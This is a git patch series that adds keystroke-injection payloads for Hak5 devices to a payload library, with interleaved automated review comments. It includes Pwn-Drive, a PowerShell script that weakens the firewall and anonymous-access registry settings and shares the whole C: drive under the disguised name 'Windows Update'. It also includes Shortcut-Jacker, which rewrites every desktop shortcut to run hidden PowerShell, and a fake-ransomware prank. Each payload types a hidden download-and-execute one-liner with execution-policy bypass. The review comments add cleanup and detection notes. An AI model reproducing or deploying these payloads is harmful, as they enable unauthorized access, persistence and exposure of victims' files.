From 0e6968eb902b72b0a656c2fa2d16707c36bccd61 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 15:00:09 -0400 Subject: [PATCH 1/7] Add files via upload --- RanFunWare/README.md | 108 +++++++++++++++++++++++++++++++++++++++++ RanFunWare/payload.txt | 16 ++++++ RanFunWare/r.ps1 | 70 ++++++++++++++++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 RanFunWare/README.md create mode 100644 RanFunWare/payload.txt create mode 100644 RanFunWare/r.ps1 diff --git a/RanFunWare/README.md b/RanFunWare/README.md new file mode 100644 index 00000000..32c53525 --- /dev/null +++ b/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/RanFunWare/payload.txt b/RanFunWare/payload.txt
new file mode 100644
index 00000000..87490168
--- /dev/null
+++ b/RanFunWare/payload.txt
@@ -0,0 +1,16 @@
+REM Title: RanFunWare
+
+REM Author: atomiczsec
+
+REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/RanFunWare/r.ps1 b/RanFunWare/r.ps1
new file mode 100644
index 00000000..b5573388
--- /dev/null
+++ b/RanFunWare/r.ps1
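Review bot: The last REM line of payload.txt ends with `mode con:cols=14 lines=1` fused onto the word `properly`, which looks like a leftover from another script rather than part of the comment, and the file has no trailing newline. The line should read `REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly`. The same fused text appears in the payload.txt re-added in PATCH 3/7 and in Pwn-Drive/payload.txt in PATCH 4/7. The REM header also never names the script the placeholder link is expected to serve (presumably r.ps1 from this commit), so a reader cannot tell from this file alone what gets executed.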
@@ -0,0 +1,70 @@
+#Hides Desktop Icons
+$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
+Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
+Get-Process "explorer"| Stop-Process
+
+#Changes Background
+#URL For the Image of your choice (Wanna Cry Ransomware Background)
+$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
+
+
+Invoke-WebRequest $url -OutFile C:\temp\test.jpg
+
+
+$setwallpapersrc = @"
+using System.Runtime.InteropServices;
+
+public class Wallpaper
+{
+ public const int SetDesktopWallpaper = 20;
+ public const int UpdateIniFile = 0x01;
+ public const int SendWinIniChange = 0x02;
+ [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+ private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
+ public static void SetWallpaper(string path)
+ {
+ SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
+ }
+}
+"@
+Add-Type -TypeDefinition $setwallpapersrc
+
+[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
+
+
+#Pop Up Message
+
+function MsgBox {
+
+[CmdletBinding()]
+param (
+[Parameter (Mandatory = $True)]
+[Alias("m")]
+[string]$message,
+
+[Parameter (Mandatory = $False)]
+[Alias("t")]
+[string]$title,
+
+[Parameter (Mandatory = $False)]
+[Alias("b")]
+[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
+[string]$button,
+
+[Parameter (Mandatory = $False)]
+[Alias("i")]
+[ValidateSet('None','Hand','Question','Warning','Asterisk')]
+[string]$image
+)
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+
+if (!$title) {$title = " "}
+if (!$button) {$button = "OK"}
+if (!$image) {$image = "None"}
+
+[System.Windows.MessageBox]::Show($message,$title,$button,$image)
+
+}
+
+MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
From e3b3bf21210e3223a7b147282c1d062e8e8e23d5 Mon Sep 17 00:00:00 2001
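Review bot: Everything r.ps1 changes is left in place when it finishes: `HideIcons` is set to 1 under HKCU, explorer is stopped, the wallpaper is replaced and `C:\temp\test.jpg` stays on disk, and neither the script nor the README says how to put the machine back. Add a header comment that lists those artifacts and the revert, for example `# Revert: Set-ItemProperty -Path $Path -Name "HideIcons" -Value 0`, followed by restarting explorer and re-applying the previous wallpaper. `SetWallpaper` also discards the return value of `SystemParametersInfo` even though the import sets `SetLastError = true`, so a failed call is silent. The same file is re-added unchanged in PATCH 3/7.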
From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:29 -0400 Subject: [PATCH 2/7] Delete RanFunWare directory --- RanFunWare/README.md | 108 ----------------------------------------- RanFunWare/payload.txt | 16 ------ RanFunWare/r.ps1 | 70 -------------------------- 3 files changed, 194 deletions(-) delete mode 100644 RanFunWare/README.md delete mode 100644 RanFunWare/payload.txt delete mode 100644 RanFunWare/r.ps1 diff --git a/RanFunWare/README.md b/RanFunWare/README.md deleted file mode 100644 index 32c53525..00000000 --- a/RanFunWare/README.md +++ /dev/null @@ -1,108 +0,0 @@ - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# RanFunWare - -A payload to prank your friends into thinking their computer got hit with ransomware. - -## Description - -This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -atomiczsec - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

πŸ“± My Socials πŸ“±

-
- - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Jsonnet - -
I-Am-Jakoby's Discord -
-
- -

(back to top)

- - - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) - -

(back to top)

diff --git a/RanFunWare/payload.txt b/RanFunWare/payload.txt deleted file mode 100644 index 87490168..00000000 --- a/RanFunWare/payload.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: RanFunWare - -REM Author: atomiczsec - -REM Description: This payload will prank your target into thinking their machine got hit with ransomware. - -REM Target: Windows 10 - -DELAY 2000 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl -ENTER - -REM Remember to replace the link with your DropBox shared link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/RanFunWare/r.ps1 b/RanFunWare/r.ps1 deleted file mode 100644 index b5573388..00000000 --- a/RanFunWare/r.ps1 +++ /dev/null 
@@ -1,70 +0,0 @@ -#Hides Desktop Icons -$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 -Get-Process "explorer"| Stop-Process - -#Changes Background -#URL For the Image of your choice (Wanna Cry Ransomware Background) -$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" - - -Invoke-WebRequest $url -OutFile C:\temp\test.jpg - - -$setwallpapersrc = @" -using System.Runtime.InteropServices; - -public class Wallpaper -{ - public const int SetDesktopWallpaper = 20; - public const int UpdateIniFile = 0x01; - public const int SendWinIniChange = 0x02; - [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] - private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); - public static void SetWallpaper(string path) - { - SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); - } -} -"@ -Add-Type -TypeDefinition $setwallpapersrc - -[Wallpaper]::SetWallpaper("C:\temp\test.jpg") - - -#Pop Up Message - -function MsgBox { - -[CmdletBinding()] -param ( -[Parameter (Mandatory = $True)] -[Alias("m")] -[string]$message, - -[Parameter (Mandatory = $False)] -[Alias("t")] -[string]$title, - -[Parameter (Mandatory = $False)] -[Alias("b")] -[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] -[string]$button, - -[Parameter (Mandatory = $False)] -[Alias("i")] -[ValidateSet('None','Hand','Question','Warning','Asterisk')] -[string]$image -) - -Add-Type -AssemblyName PresentationCore,PresentationFramework - -if (!$title) {$title = " "} -if (!$button) {$button = "OK"} -if (!$image) {$image = "None"} - -[System.Windows.MessageBox]::Show($message,$title,$button,$image) - -} - -MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning From 1977d49f8ea838a3448c9a0976145f3f32fae0d9 Mon Sep 17 00:00:00 2001 
From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:56 -0400 Subject: [PATCH 3/7] Add files via upload --- payloads/library/prank/RanFunWare/README.md | 108 ++++++++++++++++++ payloads/library/prank/RanFunWare/payload.txt | 16 +++ payloads/library/prank/RanFunWare/r.ps1 | 70 ++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 payloads/library/prank/RanFunWare/README.md create mode 100644 payloads/library/prank/RanFunWare/payload.txt create mode 100644 payloads/library/prank/RanFunWare/r.ps1 diff --git a/payloads/library/prank/RanFunWare/README.md b/payloads/library/prank/RanFunWare/README.md new file mode 100644 index 00000000..32c53525 --- /dev/null +++ b/payloads/library/prank/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/RanFunWare/payload.txt b/payloads/library/prank/RanFunWare/payload.txt
new file mode 100644
index 00000000..87490168
--- /dev/null
+++ b/payloads/library/prank/RanFunWare/payload.txt
@@ -0,0 +1,16 @@
+REM Title: RanFunWare
+
+REM Author: atomiczsec
+
+REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/payloads/library/prank/RanFunWare/r.ps1 b/payloads/library/prank/RanFunWare/r.ps1
new file mode 100644
index 00000000..b5573388
--- /dev/null
+++ b/payloads/library/prank/RanFunWare/r.ps1
@@ -0,0 +1,70 @@
+#Hides Desktop Icons
+$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
+Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
+Get-Process "explorer"| Stop-Process
+
+#Changes Background
+#URL For the Image of your choice (Wanna Cry Ransomware Background)
+$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
+
+
+Invoke-WebRequest $url -OutFile C:\temp\test.jpg
+
+
+$setwallpapersrc = @"
+using System.Runtime.InteropServices;
+
+public class Wallpaper
+{
+ public const int SetDesktopWallpaper = 20;
+ public const int UpdateIniFile = 0x01;
+ public const int SendWinIniChange = 0x02;
+ [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+ private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
+ public static void SetWallpaper(string path)
+ {
+ SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
+ }
+}
+"@
+Add-Type -TypeDefinition $setwallpapersrc
+
+[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
+
+
+#Pop Up Message
+
+function MsgBox {
+
+[CmdletBinding()]
+param (
+[Parameter (Mandatory = $True)]
+[Alias("m")]
+[string]$message,
+
+[Parameter (Mandatory = $False)]
+[Alias("t")]
+[string]$title,
+
+[Parameter (Mandatory = $False)]
+[Alias("b")]
+[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
+[string]$button,
+
+[Parameter (Mandatory = $False)]
+[Alias("i")]
+[ValidateSet('None','Hand','Question','Warning','Asterisk')]
+[string]$image
+)
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+
+if (!$title) {$title = " "}
+if (!$button) {$button = "OK"}
+if (!$image) {$image = "None"}
+
+[System.Windows.MessageBox]::Show($message,$title,$button,$image)
+
+}
+
+MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
From 85ecdd5889c21f778002a6de8409c182cf9e53c6 Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:10:33 -0400 Subject: [PATCH 4/7] Add files via upload --- .../library/exfiltration/Pwn-Drive/README.md | 107 ++++++++++++++++++ payloads/library/exfiltration/Pwn-Drive/c.ps1 | 14 +++ .../exfiltration/Pwn-Drive/payload.txt | 16 +++ 3 files changed, 137 insertions(+) create mode 100644 payloads/library/exfiltration/Pwn-Drive/README.md create mode 100644 payloads/library/exfiltration/Pwn-Drive/c.ps1 create mode 100644 payloads/library/exfiltration/Pwn-Drive/payload.txt diff --git a/payloads/library/exfiltration/Pwn-Drive/README.md b/payloads/library/exfiltration/Pwn-Drive/README.md new file mode 100644 index 00000000..c3211bb1 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/README.md @@ -0,0 +1,107 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Pwn-Drive + +A payload to share the victims "C:" drive to the network. + +## Description + +This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Pwn-Drive/c.ps1 b/payloads/library/exfiltration/Pwn-Drive/c.ps1
new file mode 100644
index 00000000..798b9eea
--- /dev/null
+++ b/payloads/library/exfiltration/Pwn-Drive/c.ps1
@@ -0,0 +1,14 @@
+ο»Ώ#Pwn-Drive
+
+#Enable Network Discovery
+netsh advfirewall firewall set rule group=”network discovery” new enable=yes
+
+#Enable File and Print
+netsh firewall set service type=fileandprint mode=enable profile=all
+
+#Setting Registry Values for allowing access to drive without credentials
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
+
+#Sharing the Drive
+New-SmbShare -Name "Windows Update" -Path "C:\"
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Pwn-Drive/payload.txt b/payloads/library/exfiltration/Pwn-Drive/payload.txt
new file mode 100644
index 00000000..a5dd5245
--- /dev/null
+++ b/payloads/library/exfiltration/Pwn-Drive/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Pwn-Drive
+
+REM Author: atomiczsec
+
+REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
From 92e76d35fc66de41a2c3774073ba6e13766ef732 Mon Sep 17 00:00:00 2001
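Review bot: c.ps1 leaves the host in a weakened state with nothing to undo it: firewall rule groups are enabled, two anonymous-access registry values under HKLM are written with `-Force`, and `C:\` is published as an SMB share named "Windows Update". The commit ships no revert and the README does not list these changes, so whoever has to clean up or investigate the machine must read the script to find them. Add a comment block at the top that enumerates each artifact and its revert, for example `# Cleanup: Remove-SmbShare -Name "Windows Update" -Force` and setting `everyoneincludesanonymous` back to 0. For detection, a share rooted at a drive root whose name imitates a system component, together with a change to the Lsa anonymous-access values, is the pattern to alert on.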
From: I-Am-Jakoby Date: Mon, 10 Oct 2022 23:37:26 -0500 Subject: [PATCH 5/7] Add files via upload --- .../execution/-BB-ShortcutJacker/README.md | 144 ++++++++++++++++++ .../-BB-ShortcutJacker/Shortcut-Jacker.ps1 | 118 ++++++++++++++ .../execution/-BB-ShortcutJacker/payload.txt | 20 +++ 3 files changed, 282 insertions(+) create mode 100644 payloads/library/execution/-BB-ShortcutJacker/README.md create mode 100644 payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 create mode 100644 payloads/library/execution/-BB-ShortcutJacker/payload.txt diff --git a/payloads/library/execution/-BB-ShortcutJacker/README.md b/payloads/library/execution/-BB-ShortcutJacker/README.md new file mode 100644 index 00000000..5fab7e17 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/README.md @@ -0,0 +1,144 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Shortcut Jacker + +

+ + Python + +
YouTube Tutorial +

+ +A script used to embed malware in the shortcut on your targets desktop + +## Description + +This payload will run a powershell script in the background of any shortcut used on the targets desktop + +This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run. + +This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run. + +So if your command exceeds that consider using an IWR function to download and execute a longer script. + +I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) + + + +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + + + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + +Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field. + + + +## Getting Started + +Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 b/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 new file mode 100644 index 00000000..88de4512 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 
@@ -0,0 +1,118 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is payload used to inject powershell code into shortcuts + +.DESCRIPTION + This payload will gather information on the shortcuts on your targets desktop + That data will then be manipulated to embed a powershell script + This script will be ran in the background when the short cut is + +#> + +############################################################################################################################################################ + +<# +.NOTES + The powershell code stored in this variable is what will run in the 
background + This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code + variable and it will still run. +#> + +$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')" + +############################################################################################################################################################ + +function Get-Shortcut { + param( + $path = $null + ) + + $obj = New-Object -ComObject WScript.Shell + + if ($path -eq $null) { + $pathUser = [System.Environment]::GetFolderPath('StartMenu') + $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu') + $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse + } + if ($path -is [string]) { + $path = dir $path -Filter *.lnk + } + $path | ForEach-Object { + if ($_ -is [string]) { + $_ = dir $_ -Filter *.lnk + } + if ($_) { + $link = $obj.CreateShortcut($_.FullName) + + $info = @{} + $info.Hotkey = $link.Hotkey + $info.TargetPath = $link.TargetPath + $info.LinkPath = $link.FullName + $info.Arguments = $link.Arguments + $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'} + $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'} + $info.WindowStyle = $link.WindowStyle + $info.IconLocation = $link.IconLocation + + return $info + } + } +} + +#----------------------------------------------------------------------------------------------------------- + +function Set-Shortcut { + param( + [Parameter(ValueFromPipelineByPropertyName=$true)] + $LinkPath, + $IconLocation, + $Arguments, + $TargetPath + ) + begin { + $shell = New-Object -ComObject WScript.Shell + } + + process { + $link = $shell.CreateShortcut($LinkPath) + + $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() | + Where-Object { $_.key -ne 'LinkPath' } | + ForEach-Object { $link.$($_.key) = $_.value } + $link.Save() + } +} + 
+#----------------------------------------------------------------------------------------------------------- + +function hijack{ +$Link = $i.LinkPath +$Loc = $i.IconLocation +$TargetPath = $i.TargetPath +if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"} +$Target = $i.Target +if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"} +} + +#----------------------------------------------------------------------------------------------------------- + +Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName} diff --git a/payloads/library/execution/-BB-ShortcutJacker/payload.txt b/payloads/library/execution/-BB-ShortcutJacker/payload.txt new file mode 100644 index 00000000..ffa72dd7 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/payload.txt @@ -0,0 +1,20 @@ +REM Title: Shortcut-Jacker + +REM Author: I am Jakoby + +REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop + +REM Target: Windows 10, 11 + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +QUACK GUI r +QUACK DELAY 100 +LED STAGE2 +QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Shortcut-Jacker.ps1')" +QUACK ENTER \ No newline at end of file From 3ee453979dc11f053b68ad70fe1f6a3587188825 Mon Sep 17 00:00:00 2001 
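Review bot: `hijack` rewrites every desktop `.lnk` in place and nothing in Shortcut-Jacker.ps1 keeps the original `TargetPath`, `Arguments` or `IconLocation` that `Get-Shortcut` has just read, so a machine used for a test cannot be restored without recreating each shortcut by hand. Persist the `Get-Shortcut` output before `Set-Shortcut` runs and document the restore step in the README. `hijack` also takes its input from the caller's `$i` and `$code` variables and ignores the argument passed to it in the final pipeline; a `param()` block would make that dependency explicit. For detection, the modified shortcuts all point at `powershell.exe` with `-w h -NoP -NonI -Exec Bypass` in the arguments, which is what a desktop `.lnk` audit or endpoint rule would key on.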
From: I-Am-Jakoby Date: Thu, 13 Oct 2022 01:20:15 -0500 Subject: [PATCH 6/7] Add files via upload --- .../library/prank/-BB-ADV-RickRoll/ReadMe.md | 115 ++++++++++++++++++ .../prank/-BB-ADV-RickRoll/payload.txt | 18 +++ 2 files changed, 133 insertions(+) create mode 100644 payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md create mode 100644 payloads/library/prank/-BB-ADV-RickRoll/payload.txt diff --git a/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md b/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md new file mode 100644 index 00000000..76755bb7 --- /dev/null +++ b/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md @@ -0,0 +1,115 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
